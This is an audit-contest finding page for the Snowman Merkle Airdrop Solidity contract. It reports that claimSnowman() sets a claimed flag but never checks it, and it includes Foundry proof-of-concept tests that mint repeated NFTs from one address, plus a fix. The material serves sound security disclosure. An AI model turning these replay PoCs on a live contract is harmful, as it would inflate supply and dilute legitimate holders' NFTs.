Snowman Merkle Airdrop

AI First Flight #10

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: low

Valid

Missing Claim Guard in `claimSnowman()` Allows Unlimited NFT Minting Per Eligible Address

bugnetter

Description

SnowmanAirdrop.claimSnowman() writes s_hasClaimedSnowman[receiver] = true on line 94. The mapping is declared at line 47 with the comment "mapping to verify if an address has claimed Snowman." The only read is in the view function getClaimStatus() at line 138, which has no effect on claim execution.
The function never reads the s_hasClaimedSnowman mapping before executing the claim logic — the write is a dead write. Any eligible address that re-acquires Snow tokens (via earnSnow()) can replay the same Merkle proof repeatedly and mint an unbounded number of Snowman NFTs.

// SnowmanAirdrop.sol — line 94

s_hasClaimedSnowman[receiver] = true; // @> written but NEVER checked before execution

// There is NO check anywhere in claimSnowman() like:

// if (s_hasClaimedSnowman[receiver]) revert SA__AlreadyClaimed();

Risk

Likelihood:

Any eligible address can replay after re-acquiring Snow via the permissionless earnSnow() function (2-week cooldown)
Replay gas (~88k) is cheaper than the initial claim (~200k), making repeated exploitation economically trivial

Impact:

The one-claim-per-address invariant of the airdrop is broken — a single eligible address can mint an unlimited number of Snowman NFTs
Supply inflation from replayed claims dilutes the value of NFTs held by legitimate claimers who followed the intended one-per-address rule

Proof of Concept

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.24;

import {Test, console} from "forge-std/Test.sol";

import {SnowmanAirdrop} from "../src/SnowmanAirdrop.sol";

import {Snowman} from "../src/Snowman.sol";

import {Snow} from "../src/Snow.sol";

import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";

contract MockWETH3 {

mapping(address => uint256) public balanceOf;

function transferFrom(address, address, uint256) external returns (bool) { return true; }

function transfer(address, uint256) external returns (bool) { return true; }

}

contract PocCR003Final is Test {

SnowmanAirdrop airdrop;

Snowman snowman;

Snow snow;

address user;

uint256 userPk;

function setUp() public {

MockWETH3 weth = new MockWETH3();

snow = new Snow(address(weth), 1, address(this));

snowman = new Snowman("svg");

(user, userPk) = makeAddrAndKey("doubleClaimUser");

vm.prank(user);

snow.earnSnow();

uint256 amount = snow.balanceOf(user);

bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(user, amount))));

bytes32 merkleRoot = leaf;

airdrop = new SnowmanAirdrop(merkleRoot, address(snow), address(snowman));

vm.prank(user);

snow.approve(address(airdrop), type(uint256).max);

}

function _claimOnce() internal {

bytes32 digest = airdrop.getMessageHash(user);

(uint8 v, bytes32 r, bytes32 s) = vm.sign(userPk, digest);

bytes32[] memory proof = new bytes32[](0);

airdrop.claimSnowman(user, proof, v, r, s);

}

function _reacquireSnow() internal {

vm.warp(block.timestamp + 2 weeks);

vm.prank(user);

snow.earnSnow();

vm.prank(user);

snow.approve(address(airdrop), type(uint256).max);

}

function test_Baseline_FINAL() public {

uint256 before_ = snowman.balanceOf(user);

_claimOnce();

assertEq(snowman.balanceOf(user), before_ + 1, "Single claim mints 1 NFT");

assertTrue(airdrop.getClaimStatus(user), "Claim status set");

}

function test_VulnerabilityDemo_FINAL() public {

_claimOnce();

assertEq(snowman.balanceOf(user), 1);

assertTrue(airdrop.getClaimStatus(user), "Flag set but never checked");

_reacquireSnow();

_claimOnce();

assertEq(snowman.balanceOf(user), 2, "Double claim - 2 NFTs from 1 eligible address");

}

function test_Variant1_TripleClaim_FINAL() public {

_claimOnce();

_reacquireSnow();

_claimOnce();

_reacquireSnow();

_claimOnce();

assertEq(snowman.balanceOf(user), 3, "Triple claim - no bound on replays");

}

function test_Variant2_FiveReplays_FINAL() public {

for (uint256 i = 0; i < 5; i++) {

if (i > 0) _reacquireSnow();

_claimOnce();

}

assertEq(snowman.balanceOf(user), 5, "5 claims from single eligible address");

console.log("NFT balance after 5 claims:", snowman.balanceOf(user));

}

function test_EdgeCase_ClaimStatusIgnored_FINAL() public {

_claimOnce();

assertTrue(airdrop.getClaimStatus(user), "Status says claimed");

_reacquireSnow();

_claimOnce();

assertEq(snowman.balanceOf(user), 2, "Claim succeeds despite getClaimStatus=true");

}

function test_EconomicAnalysis_FINAL() public {

uint256 g1 = gasleft();

_claimOnce();

uint256 gasFirstClaim = g1 - gasleft();

_reacquireSnow();

uint256 g2 = gasleft();

_claimOnce();

uint256 gasReplay = g2 - gasleft();

console.log("Gas first claim:", gasFirstClaim);

console.log("Gas replay claim:", gasReplay);

console.log("NFTs minted:", snowman.balanceOf(user));

assertLt(gasReplay, gasFirstClaim * 2, "Replay gas cost bounded");

}

Recommended Mitigation

function claimSnowman(address receiver, bytes32[] calldata merkleProof, uint8 v, bytes32 r, bytes32 s)

external

nonReentrant

{

+ if (s_hasClaimedSnowman[receiver]) {

+ revert SA__AlreadyClaimed();

+ }

// ... rest of function

Add the corresponding error declaration:

+ error SA__AlreadyClaimed();

This is standard practice. OpenZeppelin's MerkleDistributor, Uniswap's MerkleDistributor, Morpho's airdrop contracts, and Safe's token distribution all enforce a claim-once guard by reading the mapping before processing any claim. The fix is O(1) — a single SLOAD with zero side effects on existing functionality.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 1 hour ago

Submission Judgement Published

Validated

Assigned finding tags:

[L-01] Missing Claim Status Check Allows Multiple Claims in SnowmanAirdrop.sol::claimSnowman

# Root + Impact   **Root:** The [`claimSnowman`](https://github.com/CodeHawks-Contests/2025-06-snowman-merkle-airdrop/blob/b63f391444e69240f176a14a577c78cb85e4cf71/src/SnowmanAirdrop.sol#L44) function updates `s_hasClaimedSnowman[receiver] = true` but never checks if the user has already claimed before processing the claim, allowing users to claim multiple times if they acquire more Snow tokens. **Impact:** Users can bypass the intended one-time airdrop limit by claiming, acquiring more Snow tokens, and claiming again, breaking the airdrop distribution model and allowing unlimited NFT minting for eligible users. ## Description * **Normal Behavior:** Airdrop mechanisms should enforce one claim per eligible user to ensure fair distribution and prevent abuse of the reward system. * **Specific Issue:** The function sets the claim status to true after processing but never validates if `s_hasClaimedSnowman[receiver]` is already true at the beginning, allowing users to claim multiple times as long as they have Snow tokens and valid proofs. ## Risk **Likelihood**: Medium * Users need to acquire additional Snow tokens between claims, which requires time and effort * Users must maintain their merkle proof validity across multiple claims * Attack requires understanding of the missing validation check **Impact**: High * **Airdrop Abuse**: Users can claim far more NFTs than intended by the distribution mechanism * **Unfair Distribution**: Some users receive multiple rewards while others may receive none * **Economic Manipulation**: Breaks the intended scarcity and distribution model of the NFT collection ## Proof of Concept Add the following test to TestSnowMan.t.sol ```Solidity function testMultipleClaimsAllowed() public { // Alice claims her first NFT vm.prank(alice); snow.approve(address(airdrop), 1); bytes32 aliceDigest = airdrop.getMessageHash(alice); (uint8 v, bytes32 r, bytes32 s) = vm.sign(alKey, aliceDigest); vm.prank(alice); airdrop.claimSnowman(alice, AL_PROOF, v, r, s); assert(nft.balanceOf(alice) == 1); assert(airdrop.getClaimStatus(alice) == true); // Alice acquires more Snow tokens (wait for timer and earn again) vm.warp(block.timestamp + 1 weeks); vm.prank(alice); snow.earnSnow(); // Alice can claim AGAIN with new Snow tokens! vm.prank(alice); snow.approve(address(airdrop), 1); bytes32 aliceDigest2 = airdrop.getMessageHash(alice); (uint8 v2, bytes32 r2, bytes32 s2) = vm.sign(alKey, aliceDigest2); vm.prank(alice); airdrop.claimSnowman(alice, AL_PROOF, v2, r2, s2); // Second claim succeeds! assert(nft.balanceOf(alice) == 2); // Alice now has 2 NFTs } ``` ## Recommended Mitigation **Add a claim status check at the beginning of the function** to prevent users from claiming multiple times. ```diff // Add new error + error SA__AlreadyClaimed(); function claimSnowman(address receiver, bytes32[] calldata merkleProof, uint8 v, bytes32 r, bytes32 s) external nonReentrant { + if (s_hasClaimedSnowman[receiver]) { + revert SA__AlreadyClaimed(); + } + if (receiver == address(0)) { revert SA__ZeroAddress(); } // Rest of function logic... s_hasClaimedSnowman[receiver] = true; } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!